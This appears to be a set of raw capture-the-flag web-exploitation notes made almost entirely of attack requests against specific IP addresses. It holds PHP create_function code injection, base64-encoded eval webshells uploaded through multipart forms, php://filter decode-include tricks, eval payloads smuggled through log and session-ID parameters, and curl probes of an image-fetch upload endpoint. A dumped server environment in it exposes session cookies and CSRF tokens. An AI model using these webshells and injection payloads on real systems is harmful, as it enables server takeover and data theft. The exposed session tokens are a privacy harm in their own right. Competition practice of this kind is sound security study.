view-source:http://51.158.75.42:8087/?action=\create_function&arg=};var_dump(glob(%22../*%22));function%20a(){

image.png

>>> "<?php @eval($_GET['c']);var_dump(1);?>".encode("base64")
'PD9waHAgQGV2YWwoJF9HRVRbJ2MnXSk7dmFyX2R1bXAoMSk7Pz4=\n'
>>> 

POST /index.php HTTP/1.1
Host: 127.0.0.1:9090
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.1
Content-Length: 192
Content-Type: multipart/form-data; boundary=ac98ccfcbed08b2291999b0ff480d138

--ac98ccfcbed08b2291999b0ff480d138
Content-Disposition: form-data; name="file"; filename="file"

PD9waHAgQGV2YWwoJF9HRVRbJ2MnXSk7dmFyX2R1bXAoMSk7Pz4=
--ac98ccfcbed08b2291999b0ff480d138--

POST /index.php HTTP/1.1
Host: 127.0.0.1:9090
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.1
Content-Length: 205
Content-Type: multipart/form-data; boundary=ac98ccfcbed08b2291999b0ff480d138

--ac98ccfcbed08b2291999b0ff480d138
Content-Disposition: form-data; name="file"; filename="file"

<?=
include "php://filter/convert.base64-decode/resource=1.php";
--ac98ccfcbed08b2291999b0ff480d138--

view-source:http://51.158.75.42:8088/data/04445c51df9a9db8c23eab9e201887cf/9.php?c=var_dump(glob(%22../*%22));

image.png

???
<script language="php">
eval($_POST[only]);
</script>

POST /index.php HTTP/1.1
Host: 123.207.40.26:60000
Content-Length: 105
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1:9090/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7
Cookie: indent_type=space; space_units=4; keymap=sublime; csrftoken=9Ky4QNPtX829j5rQWdDVHhDwVLTO4XUQkS7nHpl4wAZXrnvB7DhwBcGJjPrB8HEi; sessionid=3abaex90lt9kmrhn0fkyhv95wypznisd
Connection: close

domain=%3c%3f%70%68%70%0a%65%76%61%6c%28%24%5f%47%45%54%5b%63%5d%29%3b%64%69%65%28%29%3b%3f%3e&log=.php/.

image.png

// steams.c 1738
    for (p = path; isalnum((int)*p) || *p == '+' || *p == '-' || *p == '.'; p++) {
        n++;
    }

POST http://php/index.php HTTP/1.1
Host: 127.0.0.1:60000
Content-Length: 114
Cache-Control: max-age=0
Origin: http://127.0.0.1:60000
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1:60000/
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7
Cookie: indent_type=space; space_units=4; keymap=sublime; csrftoken=9Ky4QNPtX829j5rQWdDVHhDwVLTO4XUQkS7nHpl4wAZXrnvB7DhwBcGJjPrB8HEi; sessionid=gAN9cQAu:1gQKO1:nz0EZkHVizd7Wbp0FMJt-DDiF9o
Connection: close

domain=PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2MnXSk7Pz4.com.&log=://filter/write=convert.base64-decode/resource=index.php/.

image.png

$_SERVER['SERVER_NAME'] 可以伪造

GET /?code=var_dump(hex2bin(session_id(session_start()))); HTTP/1.1
Host: 51.158.75.42:8084
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7
Cookie: PHPSESSID=7661725f64756d7028676c6f6228222e2e2f2a2229293b
Connection: close

image.png

image.png

My name is {'wsgi.errors': <gunicorn.http.wsgi.WSGIErrorsWrapper object at 0xffff9adc7e80>, 'wsgi.version': (1, 0), 'wsgi.multithread': True, 'wsgi.multiprocess': True, 'wsgi.run_once': False, 'wsgi.file_wrapper': <class 'gunicorn.http.wsgi.FileWrapper'>, 'SERVER_SOFTWARE': 'gunicorn/19.9.0', 'wsgi.input': <gunicorn.http.body.Body object at 0xffff9ad82e10>, 'gunicorn.socket': <gevent._socket3.socket object, fd=11, family=2, type=1, proto=6>, 'REQUEST_METHOD': 'GET', 'QUERY_STRING': '', 'RAW_URI': '/', 'SERVER_PROTOCOL': 'HTTP/1.0', 'HTTP_HOST': '51.158.73.123', 'HTTP_X_FORWARDED_PROTO': 'http', 'HTTP_X_FORWARDED_FOR': '219.217.246.194', 'HTTP_CONNECTION': 'close', 'HTTP_CACHE_CONTROL': 'max-age=0', 'HTTP_UPGRADE_INSECURE_REQUESTS': '1', 'HTTP_DNT': '1', 'HTTP_USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'HTTP_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'HTTP_REFERER': 'http://51.158.73.123:8083/login/?next=/', 'HTTP_ACCEPT_ENCODING': 'gzip, deflate', 'HTTP_ACCEPT_LANGUAGE': 'zh,en-US;q=0.9,en;q=0.8,zh-CN;q=0.7', 'HTTP_COOKIE': 'thejs.session=s%3AWdR8Pze5g-A8pPL9M1i07I_2s0DnbTDz.oG7bVoS265hR8KzjDZNPHW3ms3cukA7aJiwjhnl41bo; csrftoken=kiKTZQl4VO9vf0yzf1vd0V2SdJmweyzwSaPTCYN7MP6MP1hX85Zg33YVuNKi9clQ; sessionid=.eJxVjLEOgjAUAIuomzHxK3BpoA2ls7v728h7tAhq2pTS0cRPFxMW1rvLffNPYAWcGGMtpnloU7RTO5qQQbYwHXZw2TrC7mWdCTlcF2Ge6B6ed97N00j8n_G1iPzujX3f1n4P5-1owDiEAxQLJUEVyVISqdpSXwmpS1RCV6W0TaOxFrKvlerCMfEfqC00ww:1gQKej:eEilnTramvvogvoJ9kh5gRGZyAc', 'wsgi.url_scheme': 'http', 'REMOTE_ADDR': '172.27.0.3', 'REMOTE_PORT': '53870', 'SERVER_NAME': '0.0.0.0', 'SERVER_PORT': '8000', 'PATH_INFO': '/', 'SCRIPT_NAME': '', 'CSRF_COOKIE': 'kiKTZQl4VO9vf0yzf1vd0V2SdJmweyzwSaPTCYN7MP6MP1hX85Zg33YVuNKi9clQ'}

image.png

➜  ~ curl -X POST 'http://51.158.73.123:8080/server/editor?action=Catchimage' -d 'source[]=http://img.baidu.com/img/logo-zhidao.gif'
{"state":"SUCCESS","list":[{"url":"\/upload\/image\/b6b51ff26899674cb3aa3fb57783e4dd\/201811\/24\/50aaff118c62275ad57a.gif","source":"http:\/\/img.baidu.com\/img\/logo-zhidao.gif","state":"SUCCESS"}]}  

http://51.158.73.123:8080/server/editor?action=Catchimage

➜  Desktop cat 50aaff118c62275ad57a.gif | curl -F 'upfile=@-' "http://51.158.73.123:8080/server/editor?action=UploadImage"
{"state":"SUCCESS","url":"\/upload\/image\/b6b51ff26899674cb3aa3fb57783e4dd\/201811\/24\/4003f3ad55c4a759f0bd.gif","title":"-","original":"-"}%        

➜  Desktop cat index.php | curl -F 'upfile=@-' "http://51.158.73.123:8080/server/editor?action=UploadImage"
{"upfile":["The upfile must be an image.","The upfile must be a file of type: png, jpg, jpeg, gif, bmp."]}%